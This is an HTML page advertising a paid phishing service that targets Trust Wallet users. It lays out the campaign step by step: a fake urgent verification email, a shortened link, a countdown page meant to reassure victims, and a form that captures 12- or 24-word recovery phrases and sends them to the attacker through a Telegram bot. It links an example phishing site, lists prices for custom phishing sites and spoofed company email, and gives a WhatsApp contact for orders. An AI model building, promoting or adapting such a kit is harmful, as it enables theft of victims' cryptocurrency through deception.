<div class="main-panel">
  <div class="content-wrapper">
    <h3 class="text-white">Trust Wallet Phishing</h3>
    <br />
    <p>
      Trust wallet phishing is one of the ways hackers can obtain passphrase of
      victims.
    </p>
    <br />

    <h4>How does this work?</h4>
    <br />
    <p>
      1. The attacker sends a phishing email informs the user that their wallet
      must be verified due to an NFT update. Failing to verify the wallets, the
      email warns, will result in account suspension. The user is encouraged to
      verify their account before a near deadline by clicking on a phishing link
      with the CTA “Verify your wallet.”
    </p>
    <br />
    <p>
      2. The phishing URL is shortened by a url shortener to obfuscate the link.
    </p>
    <br />
    <p>
      3. The attacker gets notification when someone opens the phishing link
    </p>
    <br />
    <p>
      4. The phishing page displays a 15-second countdown to “open their secure
      internet environment.” This message is intended to raise the user’s
      confidence in the security of the website. After the countdown ends, the
      malicious page is triggered.
    </p>
    <br />
    <p>
      5. The user is asked to enter their recovery phrase to unlock their
      wallet. Most cryptocurrency wallets use 12-word recovery phrases, but in
      some cases, they may use 24. The phisher has considered this and includes
      a button to click if the user does in fact use a 24-word recovery phrase.
      This technique accomplishes two things: First, it makes the phishing page
      seem more legitimate in the eyes of the user because it has covered both
      scenarios. Second, the phishing page can accept credentials from either
      12- or 24-word recovery phrases, widening the scope of the phishing
      campaign.
    </p>
    <br />
    <p>6. The attacker receives the phrases via a telegram bot</p>
    <br />
    <br />

    <h4>Example Site</h4>
    <p>
      Here is an example:
      <a target="_blank" href="https://walletph.vercel.app/"
        >Trust Wallet Phisphing example</a
      >
    </p>

    <br />
    <br />

    <h4>Price for personalised</h4>
    <ul>
      <li>Website - NGN120k(1 year)</li>
      <li>Customized company email to mimic Trust Wallet - NGN30k(1 year)</li>
    </ul>
    <br />
    <p>Send us a DM on whatasapp to get started</p>
    <p>Whatsapp: +2349053110722</p>
  </div>
</div>

<script
  src="https://code.jquery.com/jquery-3.7.1.min.js"
  integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo="
  crossorigin="anonymous"
></script>
